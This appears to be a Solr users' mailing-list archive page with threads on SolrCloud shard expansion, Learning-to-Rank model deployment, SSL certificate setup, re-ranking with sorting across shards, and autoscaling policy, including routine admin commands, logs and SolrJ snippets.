at org.apache.solr.servlet.HttpSolrCall.execute(HttpSolrCall.java:723)
at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:529)
at
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:361)
at
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:305)
at
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1691)
at
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:582)
at
org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:143)
at
org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:548)
at
org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:226)
at

Add Hosts in SolrCloud

2020-09-28 Thread Massimiliano Randazzo
Hello everybody,

I have a SolrCloud cluster consisting of 4 servers, and a collection with 2
shards and a replication factor of 2:

Collection: bookReaderAttilioHortis
Shard count: 2
configName: BookReader
replicationFactor: 2
maxShardsPerNode: 2
router: compositeId
autoAddReplicas: false

I would like to add 2 more servers, bringing the shard count to 3 while keeping
a replication factor of 2, to increase storage space and performance.
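
(For reference, a rough sketch of one possible path, assuming the new servers can
reach the same ZooKeeper ensemble; the host names are placeholders, and note that
SPLITSHARD turns one existing shard into two new sub-shards, so it changes how
documents are distributed and needs enough free disk during the split:)

  # on each of the two new servers, join the existing cluster
  bin/solr start -cloud -z zk1:2181,zk2:2181,zk3:2181 -p 8983
  # split one shard (2 shards become 3 active ones), then place replicas on the new nodes
  curl 'http://localhost:8983/solr/admin/collections?action=SPLITSHARD&collection=bookReaderAttilioHortis&shard=shard1'
  curl 'http://localhost:8983/solr/admin/collections?action=ADDREPLICA&collection=bookReaderAttilioHortis&shard=shard1_0&node=newhost1:8983_solr'
  curl 'http://localhost:8983/solr/admin/collections?action=ADDREPLICA&collection=bookReaderAttilioHortis&shard=shard1_1&node=newhost2:8983_solr'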

Thank you in advance for your help

Thank you
Massimiliano Randazzo

-- 
Massimiliano Randazzo

Analista Programmatore,
Sistemista Senior
Mobile +39 335 6488039
email: massimiliano.randa...@gmail.com
pec: massimiliano.randa...@pec.net


Re: Issues deploying LTR into SolrCloud

2020-09-21 Thread krishan goyal
Not sure how SolrCloud handles this, but if you're still facing issues, you can try this:

1. Deploy the features and models as _schema_feature-store.json
and _schema_model-store.json files in the right configset.
2. Either deploy to all nodes (works for me) or add these files
to confFiles in the /replication request handler.
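
For comparison, a minimal sketch of the API-based deploy-and-reload cycle
described earlier in this thread (the collection and file names are placeholders):

  curl -XPUT 'http://localhost:8983/solr/collection1/schema/feature-store' \
       --data-binary @features.json -H 'Content-type: application/json'
  curl 'http://localhost:8983/solr/admin/collections?action=RELOAD&name=collection1'
  curl -XPUT 'http://localhost:8983/solr/collection1/schema/model-store' \
       --data-binary @model.json -H 'Content-type: application/json'
  curl 'http://localhost:8983/solr/admin/collections?action=RELOAD&name=collection1'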


On Wed, Aug 26, 2020 at 1:00 PM Dmitry Kan  wrote:

> Hello,
>
> Just noticed my numbering is off, should be:
>
> 1. Deploy a feature store from a JSON file to each collection.
> 2. Reload all collections as advised in the documentation:
>
> https://lucene.apache.org/solr/guide/7_5/learning-to-rank.html#applying-changes
> 3. Deploy the related model from a JSON file.
> 4. Reload all collections again.
>
>
> An update: applying this process twice I was able to fix the issue.
> However, it required "patching" individual collections, while reloading was
> done for all collections at once. I'm not sure this is very transparent to
> the user: maybe show the model deployment status per collection in the
> admin UI?
>
> Thanks,
>
> Dmitry
>
> On Tue, Aug 25, 2020 at 6:20 PM Dmitry Kan  wrote:
>
> > Hi,
> >
> > There is a recent thread "Replication of Solr Model and feature store" on
> > deploying LTR feature store and model into a master/slave Solr topology.
> >
> > I'm facing an issue of deploying into SolrCloud (solr 7.5.0), where
> > collections have shards with replicas. This is the process I've been
> > following:
> >
> > 1. Deploy a feature store from a JSON file to each collection.
> > 2. Reload all collections as advised in the documentation:
> >
> https://lucene.apache.org/solr/guide/7_5/learning-to-rank.html#applying-changes
> > 3. Deploy the related model from a JSON file.
> > 3. Reload all collections again.
> >
> >
> > The problem is that even after reloading the collections, shard replicas
> > continue to not have the model:
> >
> > Error from server at
> > http://server1:8983/solr/collection1_shard1_replica_n1: cannot find
> model
> > 'model_name'
> >
> > What is the proper way to address this issue and can it be potentially a
> > bug in SolrCloud?
> >
> > Is there any workaround I can try, like saving the feature store and
> model
> > JSON files into the collection config path and creating the SolrCloud
> from
> > there?
> >
> > Thanks,
> >
> > Dmitry
> >
> > --
> > Dmitry Kan
> > Luke Toolbox: http://github.com/DmitryKey/luke
> > Blog: http://dmitrykan.blogspot.com and https://medium.com/@dmitry.kan
> > Twitter: http://twitter.com/dmitrykan
> > SemanticAnalyzer: https://semanticanalyzer.info
> >
> >
>


RE: SolrCloud (6.6.6) SSL Setup - Unable to create collection

2020-09-04 Thread Victor Kretzer
I solved my problem by using just the certificate from my first node and 
copying that to the second node. I'm not sure whether all three are necessary, 
but I copied: 
*   solr-ssl.keystore.jks
*   solr-ssl-keystore.p12
*   solr-ssl.pem.
If you originally made separate certificates for each node, make sure that on 
the additional nodes you remove those cert files before adding the files from 
the first node. I moved mine to a backup folder I created because I wasn't sure 
what I was trying would work but I think that was unnecessary.
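
A sketch of the copy itself, assuming the stock server/etc location from the
enabling-ssl guide and the same install layout on both VMs (host name and paths
are placeholders):

  scp /opt/solr/server/etc/solr-ssl.keystore.jks \
      /opt/solr/server/etc/solr-ssl.keystore.p12 \
      /opt/solr/server/etc/solr-ssl.pem \
      azureuser@solr-node-02:/opt/solr/server/etc/
  sudo service solr restart    # on the second node, after the copy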

Victor 

-Original Message-
From: Victor Kretzer  
Sent: Thursday, September 3, 2020 3:03 PM
To: solr-user@lucene.apache.org
Subject: SolrCloud (6.6.6) SSL Setup - Unable to create collection

BACKGROUND: I'm attempting to setup SolrCloud (Solr 6.6.6) with an external 
zookeeper ensemble on Azure. I have three dedicated vms for the zookeeper 
ensemble and two for solr all running Ubuntu 18.04 LTS. I'm new to Solr (and 
Linux) and have been heavily relying on the Solr Ref Guide 6.6, most recently 
the following section on enabling ssl:



https://lucene.apache.org/solr/guide/6_6/enabling-ssl.html



So far I have:

Installed and setup zookeeper

Installed Solr (using install_solr_service.sh script) on both vms.

Followed the steps under Basic SSL Setup, generating certificates on each of 
the nodes.

Set the cluster-wide property to https per the Configure Zookeeper section of 
SolrCloud in the document

Started both nodes and have been able to navigate to them in my browser with 
https



If I do bin/solr status I get:



Solr process 13106 running on port 8983

{

  "solr_home":"/opt/solr-6.6.6/cloud/test2",

  "version":"6.6.6 68fa249034ba8b273955f20097700dc2fbb7a800 - ishan - 
2019-03-29 09:13:13",

  "startTime":"2020-09-03T18:15:34.092Z",

  "uptime":"0 days, 0 hours, 43 minutes, 29 seconds",

  "memory":"52.7 MB (%10.7) of 490.7 MB",

  "cloud":{

"ZooKeeper":"zk1:2181,zk2:2181,zk3:2181/solr",

"liveNodes":"2",

"collections":"0"}}







THE ISSUE

When I try to create a collection using the steps outlined in the above 
document, I get the following error:



azureuser@solr-node-01-test:/opt/solr$ sudo bin/solr create -c mycollection 
-shards 2 -force



Connecting to ZooKeeper at zk1:2181,zk2:2181,zk3:2181/solr ...

INFO  - 2020-09-03 18:21:26.784; 
org.apache.solr.client.solrj.impl.ZkClientClusterStateProvider; Cluster at 
zk1:2181,zk2:2181,zk3:2181/solr ready

Re-using existing configuration directory mycollection



Creating new collection 'mycollection' using command:

https://Solr1:8983/solr/admin/collections?action=CREATE=mycollection=2=1=1=mycollection



ERROR: Failed to create collection 'mycollection' due to: 
{Solr2:8983_solr=org.apache.solr.client.solrj.SolrServerException:IOException 
occured when talking to server at: https://Solr2:8983/solr}

*I've attached logs at the bottom of this email.



QUESTIONS:

What am I doing wrong and how can I fix it?

Was I right to create separate certificates on each of the nodes (one cert on 
vm1, another cert on vm 2)?

Do I need to copy the certs for each node into the other (if so how)?



CONCLUSION

Thank you so much in advance and if there's any other information you need 
please let me know.

Victor

2020-09-03 18:15:35.240 INFO  
(zkCallback-5-thread-1-processing-n:Solr1:8983_solr) [   ] 
o.a.s.c.c.ZkStateReader Updated live nodes from ZooKeeper... (1) -> (2)
2020-09-03 18:15:40.124 INFO  (qtp401424608-45) [   ] 
o.a.s.c.TransientSolrCoreCacheDefault Allocating transient cache for 2147483647 
transient cores
2020-09-03 18:15:40.124 INFO  (qtp401424608-45) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/cores 
params={indexInfo=false=json&_=1599156956818} status=0 QTime=23
2020-09-03 18:15:40.134 INFO  (qtp401424608-20) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json&_=1599156956818} 
status=0 QTime=29
2020-09-03 18:15:40.171 INFO  (qtp401424608-13) [   ] 
o.a.s.h.a.CollectionsHandler Invoked Collection Action :list with params 
action=LIST=json&_=1599156956818 and sendToOCPQueue=true
2020-09-03 18:15:40.172 INFO  (qtp401424608-13) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/collections 
params={action=LIST=json&_=1599156956818} status=0 QTime=1
2020-09-03 18:15:40.174 INFO  (qtp401424608-16) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json&_=1599156956818} 
status=0 QTime=8
2020-09-03 18:15:58.225 INFO  (

SolrCloud (6.6.6) SSL Setup - Unable to create collection

2020-09-03 Thread Victor Kretzer
BACKGROUND: I'm attempting to setup SolrCloud (Solr 6.6.6) with an external 
zookeeper ensemble on Azure. I have three dedicated vms for the zookeeper 
ensemble and two for solr all running Ubuntu 18.04 LTS. I'm new to Solr (and 
Linux) and have been heavily relying on the Solr Ref Guide 6.6, most recently 
the following section on enabling ssl:



https://lucene.apache.org/solr/guide/6_6/enabling-ssl.html



So far I have:

Installed and setup zookeeper

Installed Solr (using install_solr_service.sh script) on both vms.

Followed the steps under Basic SSL Setup, generating certificates on each of 
the nodes.

Set the cluster-wide property to https per the Configure Zookeeper section of 
SolrCloud in the document

Started both nodes and have been able to navigate to them in my browser with 
https



If I do bin/solr status I get:



Solr process 13106 running on port 8983

{

  "solr_home":"/opt/solr-6.6.6/cloud/test2",

  "version":"6.6.6 68fa249034ba8b273955f20097700dc2fbb7a800 - ishan - 
2019-03-29 09:13:13",

  "startTime":"2020-09-03T18:15:34.092Z",

  "uptime":"0 days, 0 hours, 43 minutes, 29 seconds",

  "memory":"52.7 MB (%10.7) of 490.7 MB",

  "cloud":{

"ZooKeeper":"zk1:2181,zk2:2181,zk3:2181/solr",

"liveNodes":"2",

"collections":"0"}}







THE ISSUE

When I try to create a collection using the steps outlined in the above 
document, I get the following error:



azureuser@solr-node-01-test:/opt/solr$ sudo bin/solr create -c mycollection 
-shards 2 -force



Connecting to ZooKeeper at zk1:2181,zk2:2181,zk3:2181/solr ...

INFO  - 2020-09-03 18:21:26.784; 
org.apache.solr.client.solrj.impl.ZkClientClusterStateProvider; Cluster at 
zk1:2181,zk2:2181,zk3:2181/solr ready

Re-using existing configuration directory mycollection



Creating new collection 'mycollection' using command:

https://Solr1:8983/solr/admin/collections?action=CREATE=mycollection=2=1=1=mycollection



ERROR: Failed to create collection 'mycollection' due to: 
{Solr2:8983_solr=org.apache.solr.client.solrj.SolrServerException:IOException 
occured when talking to server at: https://Solr2:8983/solr}

*I've attached logs at the bottom of this email.



QUESTIONS:

What am I doing wrong and how can I fix it?

Was I right to create separate certificates on each of the nodes (one cert on 
vm1, another cert on vm 2)?

Do I need to copy the certs for each node into the other (if so how)?



CONCLUSION

Thank you so much in advance and if there's any other information you need 
please let me know.

Victor

2020-09-03 18:15:35.240 INFO  
(zkCallback-5-thread-1-processing-n:Solr1:8983_solr) [   ] 
o.a.s.c.c.ZkStateReader Updated live nodes from ZooKeeper... (1) -> (2)
2020-09-03 18:15:40.124 INFO  (qtp401424608-45) [   ] 
o.a.s.c.TransientSolrCoreCacheDefault Allocating transient cache for 2147483647 
transient cores
2020-09-03 18:15:40.124 INFO  (qtp401424608-45) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/cores 
params={indexInfo=false=json&_=1599156956818} status=0 QTime=23
2020-09-03 18:15:40.134 INFO  (qtp401424608-20) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json&_=1599156956818} 
status=0 QTime=29
2020-09-03 18:15:40.171 INFO  (qtp401424608-13) [   ] 
o.a.s.h.a.CollectionsHandler Invoked Collection Action :list with params 
action=LIST=json&_=1599156956818 and sendToOCPQueue=true
2020-09-03 18:15:40.172 INFO  (qtp401424608-13) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/collections 
params={action=LIST=json&_=1599156956818} status=0 QTime=1
2020-09-03 18:15:40.174 INFO  (qtp401424608-16) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json&_=1599156956818} 
status=0 QTime=8
2020-09-03 18:15:58.225 INFO  (qtp401424608-14) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/cores 
params={indexInfo=false=json&_=1599156974989} status=0 QTime=0
2020-09-03 18:15:58.231 INFO  (qtp401424608-13) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json&_=1599156974989} 
status=0 QTime=7
2020-09-03 18:15:58.258 INFO  (qtp401424608-20) [   ] 
o.a.s.h.a.CollectionsHandler Invoked Collection Action :list with params 
action=LIST=json&_=1599156974989 and sendToOCPQueue=true
2020-09-03 18:15:58.258 INFO  (qtp401424608-20) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/collections 
params={action=LIST=json&_=1599156974989} status=0 QTime=0
2020-09-03 18:15:58.263 INFO  (qtp401424608-21) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json&_=1599156974989} 
status=0 QTime=7
2020-09-03 18:19:38.661 INFO  (qtp401424608-16) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json} status=0 QTime=6
202

Re: Ranking issue when combining sorting and re-ranking on SolrCloud (multiple shards)

2020-08-28 Thread Dmitry Kan
Hi Jörg,

Thanks for this link -- one of our search engineers started looking into
this, because the issue with sorting in a federated setting concerns
non-LTR based ranking as well.
In particular, it becomes visible in cursor based pagination in collections
that have shards with replicas. At any given time a replica can be behind
in stats and that causes issues in sorting and pagination.

I really hope LTR documentation can be updated with notes on handling
federated searches, because this should affect many Solr LTR users.

On Fri, Aug 28, 2020 at 4:28 PM Jörn Franke  wrote:

> Maybe this can help you?
>
> https://lucene.apache.org/solr/guide/7_5/distributed-requests.html#configuring-statscache-distributed-idf
>
> On Mon, May 11, 2020 at 9:24 AM Spyros Kapnissis  wrote:
>
> > HI all,
> >
> > On our current master/slave setup (no cloud), we use a a custom sorting
> > function to get the first pass results (using the sort param), and then
> we
> > use LTR for re-ranking. This works fine, i.e. re-ranking is applied on
> the
> > topN, after sorting has completed and the order is correct.
> >
> > However, as we are migrating on SolrCloud (version 7.3.1) with multiple
> > shards, this does not seem to work as expected. To my understanding, Solr
> > collects the reranked results from the shards back on a single node to
> > merge them, and then tries to re-apply sorting.
> >
> > We would expect the results to at least follow the sorting formula, even
> if
> > this is not what we want. But this still not even the case, as the
> > combination of the two (sorting + reranking) results in erratic ordering.
> >
> > Example result, where $sort_score is the sorting formula output, and
> score
> > is the LTR re-ranked output:
> >
> > {"id": "152",
> > "$sort_score": 17.38543,
> > "score": 0.22140852
> > },
> > {"id": "2016",
> > "$sort_score": 14.612957,
> > "score": 0.19214153
> > },
> > { "id": "1523",
> > "$sort_score": 14.4093275,
> > "score": 0.26738763
> > },
> > { "id": "6704",
> > "$sort_score": 13.956842,
> > "score": 0.17357588
> > },
> > { "id": "6512",
> > "$sort_score": 14.43907,
> > "score": 0.11575622
> > },
> >
> > We also tried with other simple re-rank queries apart from LTR, and the
> > issue persisted.
> >
> > Could someone please help troubleshoot? Ideally, we would want to have
> the
> > re-rank results merged on the single node, and not re-apply sorting.
> >
> > Thank you!
> >
>


-- 
Dmitry Kan
Luke Toolbox: http://github.com/DmitryKey/luke
Blog: http://dmitrykan.blogspot.com
Twitter: http://twitter.com/dmitrykan
SemanticAnalyzer: https://semanticanalyzer.info


Re: Ranking issue when combining sorting and re-ranking on SolrCloud (multiple shards)

2020-08-28 Thread Dmitry Kan
Hi Spyros,

Thanks for sharing! This certainly calls for a test, but I think the
LTR plugin could be modified to rerank the documents on the merging node.
For instance, if instead of the SolrCloud endpoint you use a separate Solr
instance to route and aggregate the federated results, the reranking could
happen only once inside that instance.

Another approach with score normalization is mentioned here:
https://sease.io/2016/10/apache-solr-learning-to-rank-better-part-4.html

On Fri, Aug 28, 2020 at 7:39 PM Spyros Kapnissis  wrote:

> Hi Dmitry,
>
> No, we were not able to solve the sorting/re-ranking issue. In the end we
> migrated the custom sorting formula to using the 'q' param instead of
> 'sort' to get back the results sorted by score as expected.
>
> That mostly solved our issues with inconsistent Solr scores. Maybe sorting
> and re-ranking are conflicting concepts.
>
> Hope this helps.
>
>
> On Fri, Aug 28, 2020 at 4:28 PM Jörn Franke  wrote:
>
> > Maybe this can help you?
> >
> >
> https://lucene.apache.org/solr/guide/7_5/distributed-requests.html#configuring-statscache-distributed-idf
> >
> > On Mon, May 11, 2020 at 9:24 AM Spyros Kapnissis 
> wrote:
> >
> > > HI all,
> > >
> > > On our current master/slave setup (no cloud), we use a a custom sorting
> > > function to get the first pass results (using the sort param), and then
> > we
> > > use LTR for re-ranking. This works fine, i.e. re-ranking is applied on
> > the
> > > topN, after sorting has completed and the order is correct.
> > >
> > > However, as we are migrating on SolrCloud (version 7.3.1) with multiple
> > > shards, this does not seem to work as expected. To my understanding,
> Solr
> > > collects the reranked results from the shards back on a single node to
> > > merge them, and then tries to re-apply sorting.
> > >
> > > We would expect the results to at least follow the sorting formula,
> even
> > if
> > > this is not what we want. But this still not even the case, as the
> > > combination of the two (sorting + reranking) results in erratic
> ordering.
> > >
> > > Example result, where $sort_score is the sorting formula output, and
> > score
> > > is the LTR re-ranked output:
> > >
> > > {"id": "152",
> > > "$sort_score": 17.38543,
> > > "score": 0.22140852
> > > },
> > > {"id": "2016",
> > > "$sort_score": 14.612957,
> > > "score": 0.19214153
> > > },
> > > { "id": "1523",
> > > "$sort_score": 14.4093275,
> > > "score": 0.26738763
> > > },
> > > { "id": "6704",
> > > "$sort_score": 13.956842,
> > > "score": 0.17357588
> > > },
> > > { "id": "6512",
> > > "$sort_score": 14.43907,
> > > "score": 0.11575622
> > > },
> > >
> > > We also tried with other simple re-rank queries apart from LTR, and the
> > > issue persisted.
> > >
> > > Could someone please help troubleshoot? Ideally, we would want to have
> > the
> > > re-rank results merged on the single node, and not re-apply sorting.
> > >
> > > Thank you!
> > >
> >
>


-- 
Dmitry Kan
Luke Toolbox: http://github.com/DmitryKey/luke
Blog: http://dmitrykan.blogspot.com
Twitter: http://twitter.com/dmitrykan
SemanticAnalyzer: https://semanticanalyzer.info


Re: Ranking issue when combining sorting and re-ranking on SolrCloud (multiple shards)

2020-08-28 Thread Spyros Kapnissis
Hi Dmitry,

No, we were not able to solve the sorting/re-ranking issue. In the end we
migrated the custom sorting formula to using the 'q' param instead of
'sort' to get back the results sorted by score as expected.

That mostly solved our issues with inconsistent Solr scores. Maybe sorting
and re-ranking are conflicting concepts.
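
For anyone who hits the same thing, here is a rough SolrJ sketch of that workaround;
it is only an illustration, and the collection, field names, boost function and LTR
model name below are made up, so the exact function query depends on whatever your
original sort formula was:

import java.util.Collections;
import java.util.Optional;

import org.apache.solr.client.solrj.SolrQuery;
import org.apache.solr.client.solrj.impl.CloudSolrClient;
import org.apache.solr.client.solrj.response.QueryResponse;

public class RerankAfterFunctionScore {
  public static void main(String[] args) throws Exception {
    try (CloudSolrClient client = new CloudSolrClient.Builder(
        Collections.singletonList("zk1:2181"), Optional.of("/solr")).build()) {
      SolrQuery q = new SolrQuery();
      // Fold the old sort formula into the relevance score via a boost/function
      // query, so the first pass is ranked by score instead of a sort param.
      q.setQuery("{!boost b=sum(field(popularity),recip(ms(NOW,publish_date),3.16e-11,1,1))}title:shoes");
      // Then re-rank the top N score-sorted documents with the LTR model.
      q.set("rq", "{!ltr model=myModel reRankDocs=100 efi.user_query=shoes}");
      q.setFields("id", "score");
      q.setRows(10);
      QueryResponse rsp = client.query("mycollection", q);
      rsp.getResults().forEach(d -> System.out.println(d.get("id") + " -> " + d.get("score")));
    }
  }
}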

Hope this helps.


On Fri, Aug 28, 2020 at 4:28 PM Jörn Franke  wrote:

> Maybe this can help you?
>
> https://lucene.apache.org/solr/guide/7_5/distributed-requests.html#configuring-statscache-distributed-idf
>
> On Mon, May 11, 2020 at 9:24 AM Spyros Kapnissis  wrote:
>
> > HI all,
> >
> > On our current master/slave setup (no cloud), we use a a custom sorting
> > function to get the first pass results (using the sort param), and then
> we
> > use LTR for re-ranking. This works fine, i.e. re-ranking is applied on
> the
> > topN, after sorting has completed and the order is correct.
> >
> > However, as we are migrating on SolrCloud (version 7.3.1) with multiple
> > shards, this does not seem to work as expected. To my understanding, Solr
> > collects the reranked results from the shards back on a single node to
> > merge them, and then tries to re-apply sorting.
> >
> > We would expect the results to at least follow the sorting formula, even
> if
> > this is not what we want. But this still not even the case, as the
> > combination of the two (sorting + reranking) results in erratic ordering.
> >
> > Example result, where $sort_score is the sorting formula output, and
> score
> > is the LTR re-ranked output:
> >
> > {"id": "152",
> > "$sort_score": 17.38543,
> > "score": 0.22140852
> > },
> > {"id": "2016",
> > "$sort_score": 14.612957,
> > "score": 0.19214153
> > },
> > { "id": "1523",
> > "$sort_score": 14.4093275,
> > "score": 0.26738763
> > },
> > { "id": "6704",
> > "$sort_score": 13.956842,
> > "score": 0.17357588
> > },
> > { "id": "6512",
> > "$sort_score": 14.43907,
> > "score": 0.11575622
> > },
> >
> > We also tried with other simple re-rank queries apart from LTR, and the
> > issue persisted.
> >
> > Could someone please help troubleshoot? Ideally, we would want to have
> the
> > re-rank results merged on the single node, and not re-apply sorting.
> >
> > Thank you!
> >
>


Re: Ranking issue when combining sorting and re-ranking on SolrCloud (multiple shards)

2020-08-28 Thread Jörn Franke
Maybe this can help you?
https://lucene.apache.org/solr/guide/7_5/distributed-requests.html#configuring-statscache-distributed-idf

On Mon, May 11, 2020 at 9:24 AM Spyros Kapnissis  wrote:

> HI all,
>
> On our current master/slave setup (no cloud), we use a a custom sorting
> function to get the first pass results (using the sort param), and then we
> use LTR for re-ranking. This works fine, i.e. re-ranking is applied on the
> topN, after sorting has completed and the order is correct.
>
> However, as we are migrating on SolrCloud (version 7.3.1) with multiple
> shards, this does not seem to work as expected. To my understanding, Solr
> collects the reranked results from the shards back on a single node to
> merge them, and then tries to re-apply sorting.
>
> We would expect the results to at least follow the sorting formula, even if
> this is not what we want. But this still not even the case, as the
> combination of the two (sorting + reranking) results in erratic ordering.
>
> Example result, where $sort_score is the sorting formula output, and score
> is the LTR re-ranked output:
>
> {"id": "152",
> "$sort_score": 17.38543,
> "score": 0.22140852
> },
> {"id": "2016",
> "$sort_score": 14.612957,
> "score": 0.19214153
> },
> { "id": "1523",
> "$sort_score": 14.4093275,
> "score": 0.26738763
> },
> { "id": "6704",
> "$sort_score": 13.956842,
> "score": 0.17357588
> },
> { "id": "6512",
> "$sort_score": 14.43907,
> "score": 0.11575622
> },
>
> We also tried with other simple re-rank queries apart from LTR, and the
> issue persisted.
>
> Could someone please help troubleshoot? Ideally, we would want to have the
> re-rank results merged on the single node, and not re-apply sorting.
>
> Thank you!
>


Re: Ranking issue when combining sorting and re-ranking on SolrCloud (multiple shards)

2020-08-28 Thread Dmitry Kan
Hi Spyros,

Did you manage to solve this issue and if yes, can you please share your
solution?

On Mon, May 11, 2020 at 10:24 AM Spyros Kapnissis  wrote:

> HI all,
>
> On our current master/slave setup (no cloud), we use a a custom sorting
> function to get the first pass results (using the sort param), and then we
> use LTR for re-ranking. This works fine, i.e. re-ranking is applied on the
> topN, after sorting has completed and the order is correct.
>
> However, as we are migrating on SolrCloud (version 7.3.1) with multiple
> shards, this does not seem to work as expected. To my understanding, Solr
> collects the reranked results from the shards back on a single node to
> merge them, and then tries to re-apply sorting.
>
> We would expect the results to at least follow the sorting formula, even if
> this is not what we want. But this still not even the case, as the
> combination of the two (sorting + reranking) results in erratic ordering.
>
> Example result, where $sort_score is the sorting formula output, and score
> is the LTR re-ranked output:
>
> {"id": "152",
> "$sort_score": 17.38543,
> "score": 0.22140852
> },
> {"id": "2016",
> "$sort_score": 14.612957,
> "score": 0.19214153
> },
> { "id": "1523",
> "$sort_score": 14.4093275,
> "score": 0.26738763
> },
> { "id": "6704",
> "$sort_score": 13.956842,
> "score": 0.17357588
> },
> { "id": "6512",
> "$sort_score": 14.43907,
> "score": 0.11575622
> },
>
> We also tried with other simple re-rank queries apart from LTR, and the
> issue persisted.
>
> Could someone please help troubleshoot? Ideally, we would want to have the
> re-rank results merged on the single node, and not re-apply sorting.
>
> Thank you!
>


-- 
Dmitry Kan
Luke Toolbox: http://github.com/DmitryKey/luke
Blog: http://dmitrykan.blogspot.com
Twitter: http://twitter.com/dmitrykan
SemanticAnalyzer: https://semanticanalyzer.info


Re: Issues deploying LTR into SolrCloud

2020-08-26 Thread Dmitry Kan
Hello,

Just noticed my numbering is off, should be:

1. Deploy a feature store from a JSON file to each collection.
2. Reload all collections as advised in the documentation:
https://lucene.apache.org/solr/guide/7_5/learning-to-rank.html#applying-changes
3. Deploy the related model from a JSON file.
4. Reload all collections again.
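
As a rough illustration of those four steps, here is a sketch that drives them from
Java for a single collection; the host, collection and file names are made up, and it
assumes the stock LTR feature-store/model-store endpoints plus a Collections API
reload (Java 11 HttpClient for the PUTs, SolrJ for the reloads):

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.file.Path;

import org.apache.solr.client.solrj.impl.HttpSolrClient;
import org.apache.solr.client.solrj.request.CollectionAdminRequest;

public class DeployLtr {
  static final String SOLR = "http://localhost:8983/solr";   // hypothetical node
  static final String COLLECTION = "mycollection";           // hypothetical collection

  public static void main(String[] args) throws Exception {
    HttpClient http = HttpClient.newHttpClient();
    // 1. feature store, 2. reload, 3. model, 4. reload again
    put(http, SOLR + "/" + COLLECTION + "/schema/feature-store", Path.of("myFeatures.json"));
    reload();
    put(http, SOLR + "/" + COLLECTION + "/schema/model-store", Path.of("myModel.json"));
    reload();
  }

  static void put(HttpClient http, String url, Path json) throws Exception {
    HttpRequest req = HttpRequest.newBuilder(URI.create(url))
        .header("Content-Type", "application/json")
        .PUT(HttpRequest.BodyPublishers.ofFile(json))
        .build();
    System.out.println(url + " -> " + http.send(req, HttpResponse.BodyHandlers.ofString()).statusCode());
  }

  static void reload() throws Exception {
    try (HttpSolrClient solr = new HttpSolrClient.Builder(SOLR).build()) {
      CollectionAdminRequest.reloadCollection(COLLECTION).process(solr);
    }
  }
}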


An update: applying this process twice I was able to fix the issue.
However, it required "patching" individual collections, while reloading was
done for all collections at once. I'm not sure this is very transparent to
the user: maybe show the model deployment status per collection in the
admin UI?

Thanks,

Dmitry

On Tue, Aug 25, 2020 at 6:20 PM Dmitry Kan  wrote:

> Hi,
>
> There is a recent thread "Replication of Solr Model and feature store" on
> deploying LTR feature store and model into a master/slave Solr topology.
>
> I'm facing an issue of deploying into SolrCloud (solr 7.5.0), where
> collections have shards with replicas. This is the process I've been
> following:
>
> 1. Deploy a feature store from a JSON file to each collection.
> 2. Reload all collections as advised in the documentation:
> https://lucene.apache.org/solr/guide/7_5/learning-to-rank.html#applying-changes
> 3. Deploy the related model from a JSON file.
> 3. Reload all collections again.
>
>
> The problem is that even after reloading the collections, shard replicas
> continue to not have the model:
>
> Error from server at
> http://server1:8983/solr/collection1_shard1_replica_n1: cannot find model
> 'model_name'
>
> What is the proper way to address this issue and can it be potentially a
> bug in SolrCloud?
>
> Is there any workaround I can try, like saving the feature store and model
> JSON files into the collection config path and creating the SolrCloud from
> there?
>
> Thanks,
>
> Dmitry
>
> --
> Dmitry Kan
> Luke Toolbox: http://github.com/DmitryKey/luke
> Blog: http://dmitrykan.blogspot.com and https://medium.com/@dmitry.kan
> Twitter: http://twitter.com/dmitrykan
> SemanticAnalyzer: https://semanticanalyzer.info
>
>


Issues deploying LTR into SolrCloud

2020-08-25 Thread Dmitry Kan
Hi,

There is a recent thread "Replication of Solr Model and feature store" on
deploying LTR feature store and model into a master/slave Solr topology.

I'm facing an issue of deploying into SolrCloud (solr 7.5.0), where
collections have shards with replicas. This is the process I've been
following:

1. Deploy a feature store from a JSON file to each collection.
2. Reload all collections as advised in the documentation:
https://lucene.apache.org/solr/guide/7_5/learning-to-rank.html#applying-changes
3. Deploy the related model from a JSON file.
3. Reload all collections again.


The problem is that even after reloading the collections, shard replicas
continue to not have the model:

Error from server at http://server1:8983/solr/collection1_shard1_replica_n1:
cannot find model 'model_name'

What is the proper way to address this issue and can it be potentially a
bug in SolrCloud?

Is there any workaround I can try, like saving the feature store and model
JSON files into the collection config path and creating the SolrCloud from
there?

Thanks,

Dmitry

-- 
Dmitry Kan
Luke Toolbox: http://github.com/DmitryKey/luke
Blog: http://dmitrykan.blogspot.com and https://medium.com/@dmitry.kan
Twitter: http://twitter.com/dmitrykan
SemanticAnalyzer: https://semanticanalyzer.info


Re: How to Write Autoscaling Policy changes to Zookeeper/SolrCloud using the autoscaling Java API

2020-08-24 Thread Howard Gonzalez
Good morning! To add more context on the question, I can successfully use the 
Java API to build the list of new Clauses. However, the problem that I have is 
that I don't know how to "write" those changes back to solr using the Java API. 
